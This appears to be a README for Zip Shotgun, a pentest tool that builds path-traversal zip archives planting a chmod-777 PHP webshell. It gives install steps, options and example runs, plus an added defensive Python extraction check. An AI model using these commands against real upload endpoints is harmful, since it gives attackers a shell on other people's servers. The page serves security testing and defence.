Zip Shotgun - Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities


Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. The idea for this script comes from the post on the Silent Signal Techblog, Compressed File Upload And Command Execution, and from OWASP, Test Upload of Malicious Files.
This script creates an archive that contains files with "../" in the filename. When the archive is extracted, this can cause files to be written to parent directories. It can allow an attacker to extract shells to directories that can be accessed from a web browser.
The default webshell is wwwolf's PHP web shell, and all the credit for it goes to WhiteWinterWolf. Source is available at https://github.com/WhiteWinterWolf/wwwolf-php-webshell
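
The server-side check that defeats the "../" entry names described above, and the chmod 777 permission bits shown in the example output further down, as an added example that is not part of the Zip Shotgun project. The function names and the sample archive (inert text entries) are constructed for illustration, and POSIX paths are assumed.

```python
import io
import os
import stat
import zipfile


def audit_zip(data: bytes, dest: str) -> list:
    """Return (entry, reason) pairs for entries that must block extraction."""
    root = os.path.realpath(dest)
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")  # treat both separators alike
            target = os.path.realpath(os.path.join(root, name))
            if os.path.commonpath([root, target]) != root:
                findings.append((info.filename, "escapes extraction directory"))
            mode = stat.S_IMODE(info.external_attr >> 16)  # Unix bits, if present
            if mode & stat.S_IWOTH:
                findings.append((info.filename, "world-writable mode %o" % mode))
    return findings


def safe_extract(data: bytes, dest: str) -> list:
    """Extract only if the audit is clean; never honour archive permissions."""
    findings = audit_zip(data, dest)
    if findings:
        raise ValueError("archive rejected: %r" % findings)
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with zf.open(info) as src, open(path, "wb") as out:
                out.write(src.read())
            os.chmod(path, 0o640)  # fixed mode chosen by the server
            written.append(path)
    return written


def build_sample(names, mode=0o644) -> bytes:
    """Constructed test input: inert text entries with the given names and mode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in names:
            info = zipfile.ZipInfo(name)
            info.external_attr = (stat.S_IFREG | mode) << 16
            zf.writestr(info, b"constructed sample\n")
    return buf.getvalue()
```

Rejecting the whole archive on the first finding, rather than skipping the offending entries, also gives the upload handler a clear event to log and alert on.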

Installation
  1. Install using Python pip
    pip install zip-shotgun --upgrade
  2. Clone git repository and install
    git clone https://github.com/jpiechowka/zip-shotgun.git
    Execute from root directory of the cloned repository (where setup.py file is located)
    pip install . --upgrade

Usage and options
    Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

    Options:
      --version                       Show the version and exit.
      -c, --directories-count INTEGER
                                      Count of how many directories to go back
                                      within the zip file (e.g 3 means that 3
                                      files will be added to the zip: shell.php,
                                      ../shell.php and ../../shell.php where
                                      shell.php is the name of the shell you
                                      provided or randomly generated value
                                      [default: 16]
      -n, --shell-name TEXT           Name of the shell within the generated zip
                                      file (e.g shell). If not provided it will be
                                      randomly generated. Cannot have whitespaces
      -f, --shell-file-path PATH      A file that contains code for the shell. If
                                      this option is not provided wwwolf
                                      (https://github.com/WhiteWinterWolf/wwwolf-
                                      php-webshell) php shell will be added
                                      instead. If name is provided it will be
                                      added to the zip with the provided name or
                                      if not provided the name will be randomly
                                      generated.
      --compress                      Enable compression. If this flag is set
                                      archive will be compressed using DEFALTE
                                      algorithm with compression level of 9. By
                                      default there is no compression applied.
      -h, --help                      Show this message and exit.

Examples
  1. Using all default options
    zip-shotgun archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
    ...
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
  2. Using default options and enabling compression for archive file
    zip-shotgun --compress archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    ...
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
  3. Using default options but changing the number of directories to go back in the archive to 3
    zip-shotgun --directories-count 3 archive.zip
    zip-shotgun -c 3 archive.zip
    The script will write 3 files in total to the archive
    Part of the script output
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:17:43 +0100 |  WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F
    12/Dec/2018 Wed 23:17:43 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL
  4. Using default options but providing shell name within archive and enabling compression
    Shell name cannot have whitespaces
    zip-shotgun --shell-name custom-name --compress archive.zip
    zip-shotgun -n custom-name --compress archive.zip
    Name for shell files within the archive will be set to the one provided by the user.
    Part of the script output
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:19:12 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../../../custom-name.php
    ...
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Finished. Try to access shell using custom-name.php in the URL
  5. Provide custom shell file but use random name within archive. Set directories count to 3
    zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
    zip-shotgun -c 3 -f ./custom-shell.php archive.zip
    Shell code will be extracted from user provided file. Names within the archive will be randomly generated.
    Part of the script output
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:21:37 +0100 |  WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL
  6. Provide custom shell file and set shell name to save within archive. Set directories count to 3 and use compression
    zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
    zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
    Shell code will be extracted from user provided file. Names within the archive will be set to user provided name.
    Part of the script output
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Finished. Try to access shell using custom-name.php in the URL